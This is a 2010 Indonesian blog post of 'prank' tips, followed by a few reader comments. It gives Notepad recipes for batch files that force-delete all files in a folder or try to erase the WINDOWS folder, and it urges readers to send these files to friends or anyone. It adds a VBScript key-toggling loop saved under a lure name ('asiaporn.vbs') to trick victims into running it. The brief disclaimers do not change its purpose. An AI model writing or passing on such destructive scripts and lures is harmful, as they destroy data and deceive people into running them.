jump to navigation

Ngerjain Orang Lain pake Notepad Mei 3, 2010

Posted by Cyber Purwakarta in Komputer, Tips dan Trik.
Tags: , , , ,
trackback

Seperti Tread gw sebelumnya, gw menulis tentang Notepad..
dan Ingat !
Jangan Disalah Gunakan… Ini cuman Buat iseng

Notepad adalah senjata Ampuh

gunakan notepad sebagai senjata kalian untuk ngerjain orang lain.

Menghapus Files dan Folder

1. buka notepad trus ketik DEL /F /Q *
2. save as dan simpan dengan nama test.cmd
3. kalau elo dobel klik file test.cmd maka semua files dan folder akan terhapus.

Menghapus Files Tertentu

1. buka notepad trus ketik erase C:TEST.txt
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus

Menghapus Folder Tertentu

1. buka notepad trus ketik erase C:WINDOWS
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus

nah kalo sudah jadi, tinggal kalian kirim aja ke temen kalian, ato siapapun. simpel tapi “merugikan”

Tambahan :

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

1. copy paste code di notepad
2. save as asiaporn.vbs – save as sebagai “All Files” bukan text
3. klik 2 kali terus tinggal aja PCnya

Sekali Lagi
Ingat !
Jangan di SalahGunakan

(www.indowebster.web.id) Forum

Komentar»

1. men999 - Mei 3, 2010

saya coba dulu gan…

2. felli50 - Mei 3, 2010
3. mohammad nur - Mei 5, 2010

makasi ilmux ya!


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: